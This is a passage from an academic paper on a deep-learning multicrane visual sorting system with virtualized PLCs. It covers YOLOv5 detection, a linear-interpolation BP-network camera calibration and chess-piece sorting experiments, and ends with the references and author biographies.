belt. The architecture of YOLOv5, as s h o w ni nF i g . 5, consists of three main parts: backbone, neck, and prediction. The backbone extracts the salient features of the inputimages. A cross-stage particle network [34] is integrated into Darknet [35] to create CSPDarket as the backbone of YOLOv5. Compared with Darknet53 in YOLOv3, CSPDarket53 performs signi cantly better in terms of its computation time and detection accuracy. The purpose of the neck is to generate feature pyramidsand recognize the same object with multiscale feature fusion. A path aggregation network (PAN) [36] is used in the neck, which can easily connect the feature grid and all feature layers.Compared with feature pyramid network [37] in YOLOv3, PAN can obtain more useful features from the low and high layers. The prediction module outputs vectors that consist of thecoordinates, classi cation result, and con dence score of the predicted bounding box, which is the same as with YOLOv3. Finally, the positions and types of the materials on the conveyorbelt are obtained. We compare the performance of YOLOv3 and YOLOv5 on the visual recognition module. The output of YOLOv5 predicts ve vectors ( x 1,y 1,x 2,y 2,C ,P) for each bounding box. ( x1,y 1)denotes the lower left corner coordinates and ( x2,y 2)represents the upper right coordinates of the bounding box. Cis the classi cation of the bounding box.Pis the con dence score that re ects how accurately the bounding box is predicted. These ve vectors can be utilizedto calculate the loss to optimize the network. The total loss of Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:20 UTC from IEEE Xplore. Restrictions apply. 3730 IEEE TRANSACTIONS ON INDUSTRIAL INFORMATICS, VOL. 20, NO. 3, MARCH 2024 YOLOv5 consists of a regression loss, a classi cation loss, and a con dence loss. Regression loss : The diagonal coordinates ( x1,y 1,x 2,y 2) of the predicted and truth values are used for bounding boxregression. The generalized intersection over union (GIoU) [38] method is utilized as the regression loss to allow the predicted coordinate close to the truth coordinate. Compared with IoU,GIoU can solve the problem that the loss value is 0 when the predicted bounding box and the truth bounding box do not overlap. Ais the predicted bounding box and Bis the truth bounding box. IoU is calculated as the ratio of the intersection area and union area between AandB.Cis the smallest box that includes AandB. The difference between area Cand the union area is obtained. GIoU is the ratio of the difference and area C. The regression loss is summarized as follows: L reg=1 GIoU = 1+AC AU AC IoU (1) where ACis the area of Cthat is the smallest box that includes Aand B.AUis the area of the union between truth box Aand prediction box B. Classi cation loss : It aims to recognize and optimize the classi cation of materials. Binary cross entropy with logits loss[39] is used and summarized as follows: L cls=1 NN/summationdisplay i=1[ Ciln(sigmoid(Ci))+( 1 Ci)ln(1 sigmoid(Ci))] (2) where Nis the size of the minibatch, Ciis the prediction of the classi cation, and Ciis the label of the classi cation. Con dence loss : It aims to optimize the con dence of the bounding box. We also use binary cross entropy with logits lossas the con dence loss, which is given by L con=1 NN/summationdisplay i=1[ Piln(sigmoid(Pi))+( 1 Pi)ln(1 sigmoid(Pi))] (3) where Nis the size of the minibatch, Piis the prediction of the con dence, and Piis the label of the con dence. The value of Piis [0, 1]. The total loss of YOLOv5 is Ltotal=Lreg+Lcls+Lcon. (4) D. Typical Camera Calibration Method Camera calibration [28] aims to describe the collection be- tween the pixel coordinate system and the world coordinatesystem, which requires three transformations, as shown in Fig. 6. The rst is from the pixel coordinate system ( u,v) to the image coordinate system ( x,y), where the relation between them is u v 1 = 1/dx0u 0 01/dyv0 00 1 x y 1 (5) Fig. 6. Mathematical model of camera calibration. where ( u0,v0) is the coordinate of the origin oin the pixel coordinate system, and ( dx,dy) indicates the number of pixels corresponding to the unit length in the image coordinate system. The second is from the image coordinate system ( x,y)t ot h e camera coordinate system ( Xc,Yc,Zc), and the relation between them can be summarized as follows: Zc x y 1 = f0 0f 0000 00 10 Xc Yc Zc 1 (6) where fis the focal length of the camera. The last is from the camera coordinate system ( Xc,Yc,Zc) to the world coordinate system ( Xw,Yw,Zw), and the relation between them can be summarized as follows: Xc Yc Zc 1 =/bracketleftbiggRT 0T1/bracketrightbigg Xw Yw Zw 1 (7) where Ris a rotation matrix of size 3 3,Tis a translation matrix of size 3 1, and 0Ti s( 0 ,0 ,0 ) . According to (5) (7), the relation between the pixel coordi- nate system and the world coordinate system can be obtained asfollows: Z c u v 1 =A[R,T]P = fx0u00 0fyv00 001 0 /bracketleftbiggRT 0T1/bracketrightbigg Xw Yw Zw 1 (8) where Ais the internal parameter matrix of the camera. [ R,T] is the external parameter matrix of the camera. Pis a real point in the world coordinate system. The typical camera calibration method is mostly related to the parameters of the camera. The error of the inverse transformation is large during the solving process. Equation (8)shows that the relation between the pixel coordinate system and the world Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:20 UTC from IEEE Xplore. Restrictions apply. FU et al.: MULTICRANE VISUAL SORTING SYSTEM BASED ON DEEP LEARNING WITH VIRTUALIZED PLC s 3731 Fig. 7. Comparison of base calibration and linear interpolation-based calibration. (a) The base calibration. (b) The linear interpolation-basedcalibration. Fig. 8. Architecture of BP neural network for coordinate transforma- tion. coordinate system is complex and nonlinear. BP neural network performs very well in nonlinear presentation. Therefore, a new linear interpolation-based BP neural network is proposed for camera calibration and compared with the typical camera cali-bration method. E. Linear Interpolation-Based BP Neural Network for Camera Calibration The primary procedure of camera calibration is to make a checkerboard with a size of 5 cm 5 cm for each black and white square because the units of the coordinates in the cranesystem are 5 cm. The comparison between the base calibration and linear interpolation-based calibration methods is presented in Fig. 7. The red points in the corner are the training data for BP neural network in Fig. 7(a), but the other points are never considered, which can cause large errors when the materials are not in the corner. Therefore, the linear interpolation methodis utilized to obtain more points in Fig. 7(b), which provides more training data for BP neural network to establish the relation between the pixel coordinate system and the world coordinatesystem. This can improve the robustness of BP network in cases with more materials on the conveyor belt. Fig. 8shows the architecture of BP neural network, which consists of ten layers: an input layer, hidden layers, and an output layer. In this work, the input is the pixel coordinate ( u,v), and the output is the world coordinate ( X w,Yw,Zw). The hidden layers include eight layers that have different numbers of neurons, such as 10, 24, 48, 96, 192, 96, 48, and 24. The weights wijbetween the input layer and the rst hidden layer can be taken as a 3 10TABLE I LINEAR INTERPOLATION -BASED BP N EURAL -NETWORK ALGORITHM matrix. The jth neuron s output for the rst hidden layer is O(1) j=f/parenleftbig WTx, b/parenrightbig =f/parenleftBiggI/summationdisplay i=1wijxi+b(1)/parenrightBigg (9) where i=1,2,3,j=1,2,..., 10,xiis the coordinate of feature points ( u,v, 1), and b(1)is the bias ( b1,b2,...,b j).fis the activation function, which is a recti ed linear unit (ReLU) [40] and can be summarized as follows: f(x)=/braceleftbiggx, x > 0 0,x< 0/bracerightbigg . (10) The neuron s outputs for the other hidden layers are same as those in (5).T h enth neuron s output for the output layer is O(9) n=f/parenleftbig WTx, b/parenrightbig =f/parenleftBiggM/summationdisplay m=1wmnO(8) m+b(9)/parenrightBigg (11) where m=1,2,..., 24,n=1,2,3.O(8) mis themth neuron s output for the last hidden layer. fis still the ReLU function. b(9) is the bias. The relation between the pixel coordinate system and the world coordinate system in (4)can be replaced by the BP neural network, which greatly ts the nonlinear relationship.Furthermore, BP neural network does not need to utilize the parameters of the camera to solve the inverse transformation, as this would always cause large coordinate conversion errors. The loss function is the MSE loss [41], which can be summa- rized for one point as follows: MSELoss =1 KK/summationdisplay k=1(yi yi)2(12) where yiis the prediction O(9) nof BP neural network. yiis the truth label, which is the world coordinate ( Xw,Yw,Zw)i nt h i s article. The value of Kis 3. For a minibatch, the total loss is the average of all MSE loss values for updating the network. The processing approach of the linear interpolation-based BPneural network is shown in Table I. First, the dataset is obtained Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:20 UTC from IEEE Xplore. Restrictions apply. 3732 IEEE TRANSACTIONS ON INDUSTRIAL INFORMATICS, VOL. 20, NO. 3, MARCH 2024 Fig. 9. Experimental structure of multicrane visual sorting system. from the linear interpolation method. Then, the data are sent to the network and the error is calculated. Next, the parameters for each episode are updated through the BP algorithm. Finally,the world coordinates of all objects are obtained for each frame. After training, we can obtain the loss function curve to observe the algorithmic performance, which will be shown in Section IV. F . Evaluation Methods In general, precision, recall, and mean average precision (mAP) are utilized as the standard methods for evaluating object detection performance [42]. The formulae of the precision and recall rate are given as follows: Precision (%) =TP TP+FP 100 (13) Recall Rate (%)=TP TP+FN 100 (14) where TP denotes the true positives, which are the number of correctly detected items. FP represents the false positives that are the number of predicting negative as positive, which is called the commission error. FN denotes the false negatives, which arethe number of predicting the positive as negative, which is called the omission error. Precision is de ned as the ratio of true-positive detections to all detections. The recall rate re ectsthe sensitivity of the detector. The per-class AP is given by the area under the precision recall rate curve for the detection results. mAP is the mean AP over all classes. The mAP value re ects the performance of the corresponding object detectors. The formulae of them aresummarized as follows: AP(%) = N/summationdisplay np(n) r(n) (15) mAP(%) =/summationtextQ qAP Q(16)where r(n)is the distance between adjacent points on the recall rate axis. p(n)is the value of the precision axis corre- sponding to the points on the recall rate axis. Nis the number of points. Qis the total number of classes. IV. E XPERIMENTS AND RESULTS A. Experimental Platform of Multicrane Visual Sorting System In a multicrane visual sorting system, the operation state, movement direction, speed, and other parameters of the con- veyor belt and cranes need to be controlled to achieve the controllability of material sorting. An experimental structure forthe multicrane visual sorting system is established, as shown in Fig. 9, which realizes closed-loop control in the industry that integrates C-PLC and AI technology. The scanning cycleof C-PLC is 100 ms according to the running programs. One F-vPLC in IPC1 is responsible for controlling one crane with EtherCAT protocol, and two F-vPLCs in IPC2 are responsible for controlling another crane with EtherCAT protocol and the conveyor belt with Modbus protocol. The scanning cycle ofF-vPLC is 20 ms. The scanning cycle of the UDP packet from C-PLC to F-vPLC is 50 ms. The servomotor is a DS5C series module, which drives the cranes to reach the position of the ma-terial. The frequency of the frequency converter in the conveyor belt system is (7.5 30 Hz). Ten C-PLCs are deployed on X86 server and one of them is applied to the visual sorting system.We present and discuss the experimental results obtained for the running performance of the visual recognition module, camera calibration module, and material sorting system as follows. B. User Interface (UI) of Multicrane Visual Sorting System The UI of the multicrane visual sorting system is shown in Fig. 10, which mainly consists of crane setting module, convey control module, vision state module, style setting module, and crane working state module. The crane setting module is respon-sible for working range in the X-axis and adjusting the velocity Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:20 UTC from IEEE Xplore. Restrictions apply. FU et al.: MULTICRANE VISUAL SORTING SYSTEM BASED ON DEEP LEARNING WITH VIRTUALIZED PLC s 3733 Fig. 10. UI of multicrane visual sorting system. and acceleration of the crane. Convey control module aims to control the state that includes run and stop, and the speed of the conveyor belt. The vision state module is used to monitor thecommunication connection status between C-PLC server and AI server by the indicator. Delay is the data transmission time from the camera to C-PLC server, which includes theimage transmission time from the camera to AI server, the visual processing time on AI server, and the result transmission from AI server to C-PLC server. The style setting module isdesigned to place materials in arbitrary shape for each crane according to customer requirements. The crane working state module dynamically displays the current position and movementof the crane along the X-axis in real time. UI is used to monitor the running status of the whole multicrane system and facilitate the user to set the parameters of the system. C. Results of Material Vision Detection A comparative experiment involving faster R-CNN, YOLOv3, and YOLOv5 is designed and deployed on PyTorch using NVIDIA 3090 graphics processing units. To improve the robustness of the system, data augmentation methods are utilized on the original images, including scaling, color space adjustments, and mosaic augmentation. The number ofepochs is 1000 and the batch size is 1 due to the limited dataset. Adam optimizer [43] is utilized for learning the dramatic representations. The initial learning rate is 0.001. We collect201 images that consist of red chess pieces and black chess pieces. The number of chess pieces is random in each image. More speci cally, 141 images are selected for the training set,30 images are selected for the testing set, and the other 30 images belong to the validating set. After training and testing, the precision, recall rate, and mAP are obtained on the training set, the testing set, and the validating set, which are presented in Table II. YOLOv5 achieves the best performance in terms of mAP on the training set and thevalidating set. Faster R-CNN performs similarly to YOLOv5, the precision and recall rate of which are close to 100% on the training set and the testing set. YOLOv3 is the worst one on three datasets. The overall results prove the effectiveness of YOLOv5 for object detection.TABLE II RESULTS OF FASTER R-CNN, YOLO V3,AND YOLO V5ON THE TRAINING SET,TESTING SET,AND VALIDATING SET Fig. 11. Processing time of per image on faster R-CNN, YOLOv3, and YOLOv5. The processing times per image for the three algorithms are presented in Fig. 11. Faster R-CNN and YOLOv3 consume 35.82 and 13.64 ms to obtain the position information. YOLOv5 processes one image in 12.15 ms, which is 23.67 and 1.49 ms faster than faster R-CNN and YOLOv3, respectively. This fur- ther proves the signi cant performance of YOLOv5 in themulticrane visual sorting system. Considering the accuracy and time consumption, we choose YOLOv5 as the visual recognition algorithm and use the recognition results of YOLOv5 to continuecamera calibration. Fig. 12illustrates the visual recognition performance on YOLOv5. The data on the images represent the con dencescores, each of which is the similarity of the predicted bounding box and the corresponding truth bounding box. All con dence scores are close to 1, which further demonstrates that YOLOv5performs excellently in the virtual sorting system. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:20 UTC from IEEE Xplore. Restrictions apply. 3734 IEEE TRANSACTIONS ON INDUSTRIAL INFORMATICS, VOL. 20, NO. 3, MARCH 2024 Fig. 12. Illustration of the visual recognition results based on YOLOv5. TABLE III EXAMPLE OF AAND (R,T)FOR ONECHECKBOARD ABOUT TRADITIONAL CAMERA CALIBRATION D. Results of Camera Calibration Ten 5 cm 5 cm square checkerboards are designed for training and three 5 cm 5 cm square checkerboards are used for testing. On one checkboard, there are 120 points for traditional calibration and BP with base calibration, and 437 points for BP with linear interpolation calibration. The resolution of the cam-era is 1920 1080. First, the traditional camera calibration is conducted and the parameter matrix ( A,R,T) of one checkboard is shown in Table III. Five points are presented in the world coordinate system to illustrate the performance of traditional calibration and BP without and with linear interpolation. The distance error of these ve points is shown in Table IV.(u, v) are the pixel coordinates, (X, Y ) are the truth world coordinates, and ( X /prime,Y/prime)a r et h e predicted coordinates from three algorithms. BP with linearinterpolation performs better than the traditional calibration. The average distance error of BP with linear interpolation is 0.017 cm, which is 0.041 and 0.109 cm less than that of thetraditional calibration and BP without linear interpolation, which demonstrates the effectiveness of the proposed method. The comparison between the training loss of BP neural net- work with the base calibration and linear interpolation calibra- tion is shown in Fig. 13.T h e X-axis represents 400 epochs, and the Y-axis is the MSE loss for the training dataset. We canFig. 13. MSE loss comparison of BP with and without linear interpola- tion. Fig. 14. Distance error comparison of traditional calibration, BP with- out and with linear interpolation on three images. determine that the convergence speed of linear interpolation is faster than that of base calibration. The MSE loss of the 400th epoch is 0.417 for base calibration and 0.175 for linear interpolation calibration. Therefore, linear interpolation-basedcalibration performs better than base calibration in terms of convergence speed and accuracy. The distance error comparison of traditional calibration, BP without and with linear interpolation, is presented in Fig. 14, which captures three images for testing. The X-axis shows three images that are captured in different positions and the Y-axis is the average value of the distance error for each image. BP with linear interpolation achieves the best performance, and the average distance error is 0.007 cm, which is lower by 0.067 and 0.02 cm for all images. This further proves the signi cance of BP with linear interpolation for camera calibration in the virtualsorting system. E. Experimental Results of the Whole Visual Sorting System in the Virtualized PLCs Environment After camera calibration, C-PLC receives (world coordinates, types, and timestamps) from the server and sends commands to the F-vPLCs that control the cranes to suck the materials. In the experiment, we use two kinds of chess pieces instead of theindustrial items due to the load bearing capacity of the cranes and the suction capacity of the air pumps. One crane that is responsible for sorting the red chess pieces and putting them into the red box can work in coordination with another crane that is responsible for sorting the black chess pieces and puttingthem into the black box. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:20 UTC from IEEE Xplore. Restrictions apply. FU et al.: MULTICRANE VISUAL SORTING SYSTEM BASED ON DEEP LEARNING WITH VIRTUALIZED PLC s 3735 TABLE IV DISTANCE ERROR OF TRADITIONAL CALIBRATION ,B PW ITHOUT AND WITHLINEAR INTERPOLATION Fig. 15. Undetected rate of red chesses and black chesses under different conveyor belt speeds. Fig. 16. Accuracy and time requirements of the multicrane sorting system under different conveyor belt speeds. The undetected rates of red and black chess pieces are shown in Fig. 15. The performance is compared under different con- veyor belt speeds, which are set to 1.5, 2.8, 4.0, and 5.2 m/min. A total of 200 chess pieces are placed on the conveyor belt for one test. There are 100 red chess pieces and 100 black chess pieces.The performance of the crane sorting system gradually degrades Fig. 17. Experimental diagram of the crane visual sorting system. with increasing speed. The best undetected rate result is 0.035, which is obtained under a speed of 1.5 m/min and is 0.07 lower than the undetected rate of 5.2 m/min. The working process of the mechanical arm includes acceleration and deceleration, whichcauses jitter. The reason for missed detections is that the crane cannot pick up all chess pieces if the conveyor belt is running too fast. Hence, the stability and reliability of the crane systemshould be improved in the fast-running scene, especially with more materials that need to be sorted on the conveyor belt. The accuracy and time requirements of the whole crane sort- ing system under different conveyor belt speeds are shown in Fig. 16. The accuracy is the ratio of the number of correctly detected chess pieces to 200. The time is calculated by the timeconsumed for sorting 200 chesses for one testing result. The best accuracy performance at 1.5 m/min is 96.5%, which is 7% higher than the accuracy achieved at 5.2 m/min. The time spentunder 1.5 m/min is 3.424 s, which is an increase of 1.115 s over the time spent at 5.2 m/min. The time to extract each chess piece is approximately 3.432 s when the belt is moving at 1.5 m/min, which satis es most industrial applications. With the increase in speed, the accuracy and time present opposite trends, thereason for which is the same as that of the undetected rate. The Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:20 UTC from IEEE Xplore. Restrictions apply. 3736 IEEE TRANSACTIONS ON INDUSTRIAL INFORMATICS, VOL. 20, NO. 3, MARCH 2024 main in uencing factors are the movement process of the me- chanical arm, which leads to massive jitter, and the fact that the air pump cannot support the amount of needed air in the fast- sorting scene. We can appropriately adjust the running speed to meet industrial requirements according to realistic applications. The experimental results of the crane visual sorting system are shown in Fig. 17. Two kinds of chess pieces are correctly sorted into the designated boxes in real time. V. C ONCLUSION In this article, a multicrane visual sorting system based on deep learning with virtualized PLCs was investigated, where two cranes can cooperate to sort materials on a conveyor belt in real time. C-PLCs and F-vPLCs were employed in the cloud and the eld to assist the cooperation of two cranes in a TSN envi- ronment to achieve highly reliable and stable communication. A YOLOv5-based visual recognition architecture was introduced to locate the materials and obtain their types. To determine the precise coordinates of the materials in the crown coordinate sys- tem, a new linear interpolation-based BP network was proposed to provide the relation between the pixel coordinate system and the world coordinate system. We demonstrate the performance of the proposed scheme based on real sorting datasets. For future work, many potential and viable applications with intelligent algorithms can utilize the proposed scheme. We will employ C-PLC in 5G mobile edge computing [44] and control the crane visual sorting system to meet the application requirements in the industry. REFERENCE [1] R. Y . Zhong, X. Xu, E. Klotz, and S. T. Newman, Intelligent manufac- turing in the context of industry 4.0: A review, Engineering , vol. 3, no. 5, pp. 616 630, 2017. [2] C. Zhang and Y . Lu, Study on arti cial intelligence: The state of the art and future prospects, J. Ind. Inf. Integr. , vol. 23, 2021, Art. no. 100224. [3] J. Chen, K. Li, Keqin Li, P. S. Yu, and Z. Zeng, Dynamic planning of bicycle stations in dockless public bicycle-sharing system using gated graph neural network, ACM Trans. Intell. Syst. Technol. , vol. 12, no. 2, 2021, Art. no. 25. [4] A. Mahmood et al., Industrial IoT in 5G-and-beyond networks: Vision, architecture, and design trends, IEEE Trans. Ind. Inform. , vol. 18, no. 6, pp. 4122 4137, Jun. 2022. [5] X. Li, J. Wan, H.-N. Dai, M. Imran, M. Xia, and A. Celesti, A hybrid computing solution and resource scheduling strategy for edge comput- ing in smart manufacturing, IEEE Trans. Ind. Inform. , vol. 15, no. 7, pp. 4225 4234, Jul. 2019. [6] A. G. Frank, L. S. Dalenogare, and N. F. Ayala, Industry 4.0 technologies: Implementation patterns in manufacturing companies, Int. J. Prod. Econ. , vol. 210, pp. 15 26, 2019. [7] M.-F. K rner et al., Extending the automation pyramid for industrial demand response, Procedia CIRP , vol. 81, pp. 998 1003, 2019. [8] S. Biallas, J. Brauer, and S. Kowalewski, Arcade.PLC: A veri cation platform for programmable logic controllers, in Proc. IEEE/ACM 27th Int. Conf. Autom. Softw. Eng. , 2012, pp. 338 341. [9] M. A. Sehr et al., Programmable logic controllers in the context of industry 4.0, IEEE Trans. Ind. Inform. , vol. 17, no. 5, pp. 3523 3533, May 2021. [10] Y . Wang, K. Hong, J. Zou, T. Peng, and H. Yang, A CNN-based visual sorting system with cloud-edge computing for exible manufacturing sys- tems, IEEE Trans. Ind. Inform. , vol. 16, no. 7, pp. 4726 4735, Jul. 2020. [11] B. Pu, K. Li, S. Li, and N. Zhu, Automatic fetal ultrasound standard plane recognition based on deep learning and IIoT, IEEE Trans. Ind. Inform. , vol. 17, no. 11, pp. 7771 7780, Nov. 2021. [12] L. Liu et al., Deep learning for generic object detection: A survey, Int. J. Comput. Vis. , vol. 128, no. 2, pp. 261 318, 2020.[13] L. Song, W. Wu, J. Guo, and X. Li, Survey on camera calibration tech- nique, in Proc. IEEE 5th Int. Conf. Intell. Human-Mach. Syst. Cybern. , 2013, pp. 389 392. [14] S. C. Park, C. M. Park, and G. N. Wang, A PLC programming environment based on a virtual plant, Int. J. Adv. Manuf. Technol. , vol. 39, no. 11, pp. 1262 1270, 2008. [15] S. C. Park and M. Chang, Hardware-in-the-loop simulation for a produc- tion system, Int. J. Prod. Res. , vol. 50, no. 8, pp. 2321 2330, 2012. [16] T. Goldschmidt, M. K. Murugaiah, C. Sonntag, B. Schlich, S. Bial- las, and P. Weber, Cloud-based control: A multi-tenant, horizontally scalable soft-PLC, in Proc. IEEE 8th Int. Conf. Cloud Comput. , 2015, pp. 909 916. [17] W. Mahnke, S. H. Leitner, and M. Damm, OPC Uni ed Architecture . Berlin, Germany: Springer, 2009. [18] S. Kalle, N. Ameen, H. Yo, and I. Ahmed, CLIK on PLCs! Attacking control logic with decompilation and virtual PLC, in Proc. Workshop Binary Anal. Res. , 2019, pp. 1 12. [19] J. Chen, K. Li, K. Bilal, X. Zhou, K. Li, and P. S. Yu, A bi-layered parallel training architecture for large-scale convolutional neural networks, IEEE Trans. Parallel Distrib. Syst. , vol. 30, no. 5, pp. 965 976, May 2019. [20] Z. Zou et al., Object detection in 20 years: A survey, Proc. IEEE , vol. 111, no. 3, pp. 257 276, Mar. 2023. [21] J. Redmon, S. Divvala, R. Girshick, and A. Farhadi, You only look once: Uni ed, real-time object detection, in Proc. IEEE Conf. Comput. Vis. Pattern Recognit. , 2016, pp. 779 788. [22] W. Liu et al., SSD: Single shot multibox detector, in Proc. Eur. Conf. Comput. Vis. , 2016, pp. 21 37. [23] S. Ren, K. He, R. Girshick, and J. Sun, Faster R-CNN: Towards real-time object detection with region proposal networks, IEEE Trans. Pattern Anal. Mach. Intell. , vol. 39, no. 6, pp. 1137 1149, Jun. 2017. [24] C. Chen, C. Wang, B. Liu, C. He, L. Cong, and S. Wan, Edge intel- ligence empowered vehicle detection and image segmentation for au- tonomous vehicles, IEEE Trans. Intell. Transp. Syst. , to be published, doi: 10.1109/TITS.2022.3232153 . [25] Y . Song, L. Gao, X. Li, and W. Shen, A novel robotic grasp detec- tion method based on region proposal networks, Robot. Comput.-Integr. Manuf. , vol. 65, 2020, Art. no. 101963. [26] G. Jocher et al., yolov5, Code repository, 2020. [Online]. Available: https://github.com/ultralytics/yolov5 [27] Y . Hold-Geoffroy et al., A perceptual measure for deep single image cam- era calibration, in Proc. IEEE/CVF Conf. Comput. Vis. Pattern Recognit. , 2018, pp. 2354 2363. [28] Z. Zhang, A exible new technique for camera calibration, IEEE Trans. Pattern Anal. Mach. Intell. , vol. 22, no. 11, pp. 1330 1334, Nov. 2000. [29] C. A. I. Sheng, L. I. Qing, and Q. Yan-feng, Camera calibration of attitude measurement system based on BP neural network, J. Optoelectron. Laser , vol. 18, no. 7, pp. 832 834, 2007. [30] S. N. Raza et al., Arti cial intelligence based camera calibration, inProc. 15th Int. Wireless Commun. Mobile Comput. Conf. , 2019, pp. 1564 1569. [31] S. Sudhakaran, K. Montgomery, M. Kashef, D. Cavalcanti, and R. Can- dell, Wireless time sensitive networking impact on an industrial col- laborative robotic workcell, IEEE Trans. Ind. Inform. , vol. 18, no. 10, pp. 7351 7360, Oct. 2022. [32] C. Gomez, A. Arcia-Moret, and J. Crowcroft, TCP in the Internet of Things: From ostracism to prominence, IEEE Internet Comput. , vol. 22, no. 1, pp. 29 41, Jan./Feb. 2018. [33] C. DeCusatis, R. M. Lynch, W. Kluge, J. Houston, P. A. Wojciak, and S. Guendert, Impact of cyberattacks on precision time protocol, IEEE Trans. Instrum. Meas. , vol. 69, no. 5, pp. 2172 2181, May 2020. [34] C.-Y . Wang, H.-Y . M. Liao, Y .-H. Wu, P.-Y . Chen, J.-W. Hsieh, and I.-H. Yeh, CSPNet: A new backbone that can enhance learning capability of CNN, in Proc. IEEE/CVF Conf. Comput. Vis. Pattern Recognit. Work- shops , 2020, pp. 1571 1580. [35] J. Redmon, DarkNet: Open source neural networks in C, 2013. [Online]. Available: http://pjreddie.com/darknet/ [36] S. Liu, L. Qi, H. Qin, J. Shi, and J. Jia, Path aggregation network for instance segmentation, in Proc. IEEE/CVF Conf. Comput. Vis. Pattern Recognit. , 2018, pp. 8759 8768. [37] T.-Y . Lin, P. Dollar, R. Girshick, K. He, B. Hariharan, and S. Belongie, Feature pyramid networks for object detection, in Proc. IEEE Conf. Comput. Vis. Pattern Recognit. , 2017, pp. 936 944. [38] H. Rezato ghi, N. Tsoi, J. Gwak, A. Sadeghian, I. Reid, and S. Savarese, Generalized intersection over union: A metric and a loss for bounding box regression, in Proc. IEEE/CVF Conf. Comput. Vis. Pattern Recognit. , 2019, pp. 658 666. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:20 UTC from IEEE Xplore. Restrictions apply. FU et al.: MULTICRANE VISUAL SORTING SYSTEM BASED ON DEEP LEARNING WITH VIRTUALIZED PLC s 3737 [39] I. Chamveha et al., Automated cardiothoracic ratio calculation and cardiomegaly detection using deep learning approach, 2020, arXiv:2002.07468 . [40] V . Nair and G. E. Hinton, Recti ed linear units improve restricted Boltz- mann machines, in Proc. Int. Conf. Mach. Learn. , 2010, pp. 807 814. [41] M. Mathieu, C. Couprie, and Y . LeCun, Deep multi-scale video prediction beyond mean square error, 2015, arXiv:1511.05440 . [42] P. Henderson and V . Ferrari, End-to-end training of object class detectors for mean average precision, in Proc. Asian Conf. Comput. Vis. , 2016, pp. 198 213. [43] D. P. Kingma et al., Adam: A method for stochastic optimization, 2014, arXiv:1412.6980 . [44] F. Spinelli and V . Mancuso, Toward enabled industrial verticals in 5G: A survey on MEC-based approaches to provisioning and exibility, IEEE Commun. Surveys Tut. , vol. 23, no. 1, pp. 596 630, Jan./Mar. 2021. Meixia Fu received the B.S. degree in commu- nication engineering from the Qingdao Univer-sity of Science and Technology, Qingdao, China, in 2014, and the Ph.D. degree in information and communication engineering from the Bei-jing University of Posts and Telecommunica-tions, Beijing, China, in 2021. She is currently a Postdoctoral Research As- sociate with the University of Science and Tech-nology, Beijing, China. Her research interests include industrial Internet of Things, intelligent manufacturing, environmental perception, arti cial intelligence, com-puter vision, and image processing. Zhenqian Wang received the B.Eng. degree majored in intelligent science and technology during the undergraduate period in 2021 fromthe School of Automation, University of Scienceand Technology, Beijing, China, where he is currently working toward the master s degree in electronic information with the Institute of Indus-trial Internet. His current research interests include indus- trial Internet of Things, intelligent manufactur- ing, computer vision, deep learning, and depth estimation. Jianquan Wang received the doctoral degree in communication engineering from the BeijingUniversity of Posts and Telecommunications,Beijing, China, in 2003. Since 2020, he has been a Professor with the University of Science and Technology, Beijing,China. He is the leader of scienti c and techno-logical innovation of the National Ten Thousand Talents Program, the young and middle-aged leading talents of the Ministry of Science andTechnology, the expert enjoying the special al- lowance of the State Council. He presided over and participated in more than ten special projects, including 863, NSFC, major projectssupported by the Ministry of Science and Technology, National Scienceand Technology major special projects. More than 100 articles have been published, more than 40 invention patents have been authorized; more than 60 international standard manuscripts have been submitted.He is interested in researching in Industrial Internet and heterogeneousnetwork collaboration, network system, key technology, and network security. Qu Wang received the B.S. degree in informa- tion and communication engineering from the School of Software Engineering, Beijing Univer- sity of Posts and Telecommunication, Beijing,China, in 2014, the M.S. degree in informationand communication engineering from the Uni- versity of Chinese Academy of Sciences, Bei- jing, China, in 2017, and the Ph.D. degree in in-formation and communication engineering fromthe Beijing University of Posts and Telecommu- nications, Beijing, China, in 2021. He is currently an Associate Professor with the University of Science and Technology, Beijing, China. His research interests include location-based services, context awareness, pervasive computing, industrial In- ternet of Things, and arti cial intelligence. Zhangchao Ma received the bachelor s and doctor s degrees in communication engineer- ing from the Beijing University of Posts and Telecommunications, Beijing, China, in 2002and 2011, respectively. From 2017 to 2020, he was with Guoke Quan- tum Communication Network Company Ltd. From 2011 to 2017, he was with the NetworkTechnology Research Institute, China UnicomResearch Institute, Beijing. Since May 2020, he has been an Associate Professor with the Uni- versity of Science and Technology Beijing, Beijing. He has participatedin multiple funded research grants, including National Major SpecialProjects. His research interests include researching in industrial delay sensitive network, network endogenous security, quantum secure com- munication, and B5G. Danshi Wang (Senior Member, IEEE) received the Ph.D. degree in electromagnetic eld and microwave technology from the Beijing Univer-sity of Posts and Telecommunications (BUPT),Beijing, China, in 2016. He is currently an Associate Professor with the State Key Laboratory of Information Photon-ics and Optical Communications, BUPT. He hasproposed and veri ed a series of AI-driven com- munication and network technology solutions, which has been applied to telecom operator and Internet service provider. He has authored or coauthored more than 160technical papers in international journals and conference, including 20 invited talks in ECOC/ACP/OECC/ICAIT. He has held and participated in multiple funded research grants, including the National Key R&DProgram of China, National Natural Science Foundation of China, andthe Fundamental Research Funds for the Central Universities. His re- search interests include intelligent communication and network, arti cial intelligence (AI), digital twin network, and AI for science. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:20 UTC from IEEE Xplore. Restrictions apply.
Summary:
